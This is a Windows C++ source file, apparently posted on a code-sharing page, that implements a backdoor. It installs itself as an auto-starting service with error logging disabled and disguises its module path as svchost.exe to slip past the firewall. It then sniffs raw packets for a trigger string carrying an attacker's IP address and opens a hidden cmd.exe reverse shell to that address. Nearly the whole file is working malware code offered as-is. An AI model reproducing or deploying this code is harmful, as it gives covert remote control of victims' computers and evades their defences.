📄 service3.cpp
字号:
#include "stdio.h"
#include "winsock2.h"
#include "winsvc.h"
#include "winuser.h"
#pragma comment (lib,"advapi32.lib")
#pragma comment(lib,"ws2_32.lib")
#define LISPORT 65371
#define PATHLEN 32
typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
USHORT Flags;
USHORT Length;
ULONG TimeStamp;
UNICODE_STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _PEB_LDR_DATA {
ULONG Length;
BOOLEAN Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
ULONG MaximumLength;
ULONG Length;
ULONG Flags;
ULONG DebugFlags;
PVOID ConsoleHandle;
ULONG ConsoleFlags;
HANDLE StdInputHandle;
HANDLE StdOutputHandle;
HANDLE StdErrorHandle;
UNICODE_STRING CurrentDirectoryPath;
HANDLE CurrentDirectoryHandle;
UNICODE_STRING DllPath;
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
PVOID Environment;
ULONG StartingPositionLeft;
ULONG StartingPositionTop;
ULONG Width;
ULONG Height;
ULONG CharWidth;
ULONG CharHeight;
ULONG ConsoleTextAttributes;
ULONG WindowFlags;
ULONG ShowWindowFlags;
UNICODE_STRING WindowTitle;
UNICODE_STRING DesktopName;
UNICODE_STRING ShellInfo;
UNICODE_STRING RuntimeData;
RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB_FREE_BLOCK {
struct _PEB_FREE_BLOCK *Next;
ULONG Size;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
BOOLEAN Spare;
HANDLE Mutant;
PVOID ImageBaseAddress;
PPEB_LDR_DATA LoaderData;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
PPEBLOCKROUTINE FastPebLockRoutine;
PPEBLOCKROUTINE FastPebUnlockRoutine;
ULONG EnvironmentUpdateCount;
PVOID *KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
PPEB_FREE_BLOCK FreeList;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PVOID *ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID **ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;
} PEB, *PPEB;
//////////////////////////////////////////////
//--------------------------------------------------------------------
#include <ws2tcpip.h>
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
typedef struct _IP{
UCHAR headerLength:4; // Header length
UCHAR version:4; // Version
UCHAR ServiceType; // 服务类型
WORD TotalLen; // 总长
WORD ID; // 标识
WORD Flags:3; // 标志
WORD FragOff:13; // 分段偏移
BYTE TimeToLive; // 生命期
BYTE Protocol; // 协议
WORD HdrChksum; // 头校验和
DWORD SrcAddr; // 源地址
DWORD DstAddr; // 目的地址
BYTE Options; // 选项
} IP;
typedef IP * LPIP;
typedef IP UNALIGNED * ULPIP;
typedef IP * LPIP;
typedef IP UNALIGNED * ULPIP;
typedef struct _TCP{
WORD SrcPort; // 源端口
WORD DstPort; // 目的端口
DWORD SeqNum; // 顺序号
DWORD AckNum; // 确认号
UCHAR unused:4; // Unused
UCHAR offset:4; // Data offset
UCHAR flAgs; // Flags
WORD Window; // 窗口大小
WORD Chksum; // 校验和
WORD UrgPtr; // 紧急指针
} TCP;
typedef TCP *LPTCP;
typedef TCP UNALIGNED * ULPTCP;
typedef struct psd_hdr //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}PSD_HEADER,*PPSD_HEADER;
//--------------------------------------------------------------------
typedef struct _uty{//doesn't use in this progrAm
DWORD number;
char sign[4];
DWORD length;
char dAtA[1024];
}UTY,*PUTY;
/////////////////////////////////////////////////////////////
void ServiceMAin(DWORD dwArgc,LPTSTR* lpszArgv);
void Service_Ctrl(DWORD Opcode);
void OpenBAckDoor();
DWORD WINAPI ProClientThreAd(LPVOID lpPArAm);
SC_HANDLE hSCHAndle;
SERVICE_STATUS ssStAtus;
SERVICE_STATUS_HANDLE ssh;
void main(DWORD dwArgc,LPTSTR *lpszArgv)
{
PPEB peb;
PLDR_MODULE pModule;
char systempAth[PATHLEN*2];
char tempsystempAth[PATHLEN*2];
int i;
LPTSTR PAth,PAth2;
PAth=GetCommandLine();
int ch='/';
PAth2=strchr(PAth,ch);
if (PAth2==NULL){
strcat(PAth," /service");//判断是否有参数,,这里只判断是否有'/'就o了
printf("%s\n",PAth);
//return;
//打开数据库
SC_HANDLE hSCMAnAger=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (hSCMAnAger==NULL){
printf("OpenSCMAnAger fAiled\n");
return;
}
hSCHAndle = OpenService(hSCMAnAger,"mybd8.4",DELETE);
if (!DeleteService(hSCHAndle)){
printf("Error:%d\n",GetLastError());
}
if (hSCMAnAger != NULL) CloseServiceHandle (hSCMAnAger);
//打开数据库
hSCMAnAger=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (hSCMAnAger==NULL){
printf("OpenSCMAnAger fAiled\n");
return;
}
//创建service
hSCHAndle=CreateService(hSCMAnAger,
"mybd8.4",//看样不用是自己的程序名,,只是表示服务的名字,,
"reAl Control8.4",//在服务工具中的显示名
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,//这样好象服务入口就不用一定是ServiceMAin了,,具体区别还有待学习 :)
SERVICE_AUTO_START,//自动
SERVICE_ERROR_IGNORE,//出错不做记录
PAth,
NULL,
NULL,
NULL,
NULL,
NULL);
//如果服务存在就打开它
if (hSCHAndle==NULL){
if (GetLastError()==ERROR_SERVICE_EXISTS){
hSCHAndle= OpenService(hSCMAnAger,"mybd8.4",SERVICE_ALL_ACCESS);
if (hSCHAndle==NULL) {
printf("Open Service fAiled\n");
//return;
}
}
}
//DeleteService(hSCHAndle);
//开启服务
if (StartService(hSCHAndle,0,0)){
while(QueryServiceStatus(hSCHAndle,&ssStAtus)){//QueryServiceStAtus 在这是为了在服务开启的时候屏幕显示...... 花儿 :)
if (ssStAtus.dwCurrentState == SERVICE_START_PENDING){
printf(".");
Sleep(20);
}else{
break;
}
}
}else{
printf("StArt service fAiled:%d\n",GetLastError());
}
if (hSCMAnAger != NULL) CloseServiceHandle(hSCMAnAger);
}else{////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////透防火墙
GetSystemDirectory(tempsystempAth,PATHLEN);
strcat(tempsystempAth,"\\svchost.exe");
for (i=0;i<PATHLEN;i++){
systempAth[i*2]=tempsystempAth[i];
systempAth[i*2+1]=0;
}
__asm
{
mov eax,fs:0x30
mov peb,eax
}
pModule= (LDR_MODULE*)peb->LoaderData ->InLoadOrderModuleList .Flink;
pModule->FullDllName .MaximumLength = 202;
pModule->FullDllName .Length = 200;
//printf("%S\n",pModule->FullDllName .Buffer );
pModule->FullDllName .Buffer = (unsigned short*)systempAth;
//printf("%S\n",pModule->FullDllName .Buffer );
///////////////////////////////////////////////////////////////////////////////////
SERVICE_TABLE_ENTRY ste[2]; //只向ServiceMAin函数,,,既服务的入口函数
ste[0].lpServiceName = "mybd8.2";
ste[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMAin;
ste[1].lpServiceName = NULL;
ste[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ste);
}
}
//--------------------------------------------------------------------
void ServiceMAin(DWORD dwArgc,LPTSTR *lpszArgv)
{
//注册控制服务函数,,服务的开始,,暂停,,停止,,全靠它
ssh=RegisterServiceCtrlHandler("mybd8.2",(LPHANDLER_FUNCTION)Service_Ctrl);
//运行服务
Service_Ctrl(0);
Sleep(100);//这睡会是学来的,,估计是有好处
///MessageBox(NULL,"hi service","",0); //为啥这个死活都弹不出来呢???
//下面就是要运行的东西,,呵呵,,不过不知道为沙MessAgeBox不中 :( 知道了,winstA0
//MessageBox(NULL,"hi","hi",MB_DEFAULT_DESKTOP_ONLY);
OpenBAckDoor();
}
//--------------------------------------------------------------------
void Service_Ctrl(DWORD Opcode)
{
SERVICE_STATUS serst;
serst.dwServiceType =SERVICE_WIN32;
serst.dwControlsAccepted =SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
serst.dwWin32ExitCode =NO_ERROR;
serst.dwServiceSpecificExitCode = 0;
serst.dwCheckPoint = 0;
serst.dwWaitHint = 0;
switch(Opcode){
case SERVICE_CONTROL_STOP:
serst.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus(ssh,&serst);
break;
default:
serst.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus(ssh,&serst);
}
}
//--------------------------------------------------------------------
void OpenBAckDoor()
{
SOCKET sniffersock;
WSADATA WSAdAtA;
BOOL flAg = TRUE;
SOCKADDR_IN host;
int ret;
IP *ip;
TCP *tcp;
DWORD dwVAlue;
char hostnAme[32];
struct hostent *locAl;
char destip[32];
char myip[32];
char buff[2048];
char* tcpdAtA;
//MessageBox(NULL,"open bAckdoor","hi",MB_DEFAULT_DESKTOP_ONLY);
WSAStartup(MAKEWORD(2,2),&WSAdAtA);
if ((sniffersock = socket(AF_INET,SOCK_RAW,IPPROTO_IP)) ==SOCKET_ERROR){
printf("socket fAiled: %d\n",GetLastError());
exit(-1);
}
gethostname(hostnAme,32);
locAl = gethostbyname(hostnAme);
host.sin_addr = *(PIN_ADDR)locAl->h_addr_list [0];
host.sin_family = AF_INET;
host.sin_port = htons(81);
if (bind(sniffersock,(PSOCKADDR)&host,sizeof(host)) == SOCKET_ERROR){
printf("bind fAiled: %d\n",GetLastError());
exit(-1);
}
dwVAlue = 1;
ioctlsocket(sniffersock,SIO_RCVALL,&dwVAlue);
while(1){
memset(buff,0,2048);//becAreful here,,without this,,this buffer will receive Another stuff,become dirty
ret = recv(sniffersock,buff,2048,0);
if (ret >0){
ip = (IP*)buff;
//MessageBox(NULL,"one pAcket","hi",MB_DEFAULT_DESKTOP_ONLY);
if (ip->Protocol == 6 && ip->DstAddr == inet_addr(inet_ntoa(host.sin_addr)))
{
//MessageBox(NULL,"received one pAcket","hi",MB_DEFAULT_DESKTOP_ONLY);
tcp = (TCP*)(buff + ip->headerLength * 4);
tcpdAtA = buff + ip->headerLength *4 + tcp->offset*4;
if (strstr(tcpdAtA,"uay") != NULL){
//MessageBox(NULL,tcpdAtA,"tcp dAtA",MB_DEFAULT_DESKTOP_ONLY);
//strcpy(tcpdAtAbuff,tcpdAtA);
if(strstr(strstr(tcpdAtA,"uay"),":") != NULL){
strcpy(myip,strstr(strstr(tcpdAtA,"uay"),":")+1);
myip[strstr(myip,":")-myip] = '\0';
}
//MessageBox(NULL,inet_ntoa(host.sin_addr),"inet_ntoa(host.sin_addr)",MB_DEFAULT_DESKTOP_ONLY);
if (strcmp(inet_ntoa(host.sin_addr),myip) == 0){
strcpy(destip,myip+strlen(myip)+1);
destip[strstr(destip,":")-destip] = '\0';
//MessageBox(NULL,myip,"myip",MB_DEFAULT_DESKTOP_ONLY);
//MessageBox(NULL,destip,"destip",MB_DEFAULT_DESKTOP_ONLY);
if (TRUE){
if (CreateThread(NULL,0,ProClientThreAd,(PVOID)destip,0,NULL) == NULL){
printf("creAtethreAd fAiled: %d\n",GetLastError());
continue;
}
}
}
}
}
}
}
return;
}
//--------------------------------------------------------------------------
DWORD WINAPI ProClientThreAd(LPVOID lpPArAm)
{
int ret;
char Buff[1024];
char destip[32];
WSADATA WSAdAtA;
strcpy(destip,(char*)lpPArAm);
SOCKET destsock;
SOCKADDR_IN dest;
dest.sin_family = AF_INET;
dest.sin_port = htons(8180);
dest.sin_addr.S_un .S_addr = inet_addr(destip);
WSAStartup(MAKEWORD(2,2),&WSAdAtA);
destsock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
ret = connect(destsock,(struct sockaddr*)&dest,sizeof(dest));
SECURITY_ATTRIBUTES sA;
sA.nLength = sizeof(sA);
sA.bInheritHandle = true;
sA.lpSecurityDescriptor = 0;
HANDLE hReAdPipe1,hWritePipe1,hReAdPipe2,hWritePipe2;
ret=CreatePipe(&hReAdPipe1,&hWritePipe1,&sA,0);
ret=CreatePipe(&hReAdPipe2,&hWritePipe2,&sA,0);
STARTUPINFO si={sizeof(si)};
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReAdPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;
char cmdLine[]="cmd.exe";
PROCESS_INFORMATION ProcessInformAtion;
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformAtion);
unsigned long lBytesReAd;
while(1){
Sleep(100);
ret=PeekNamedPipe(hReAdPipe1,Buff,1024,&lBytesReAd,0,0);
if(lBytesReAd){
ret=ReadFile(hReAdPipe1,Buff,lBytesReAd,&lBytesReAd,0);
if(!ret) break;
ret = send(destsock,Buff,lBytesReAd,0);
if (ret<=0) break;
}else{
lBytesReAd = recv(destsock,Buff,1024,0);
if(lBytesReAd<=0) break;
ret = WriteFile(hWritePipe2,Buff,lBytesReAd,&lBytesReAd,0);
if(!ret) break;
}
}
return 0;
}
//--------------------------------------------------------------------
//--------------------writen by uty@uaty -----------------------//
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -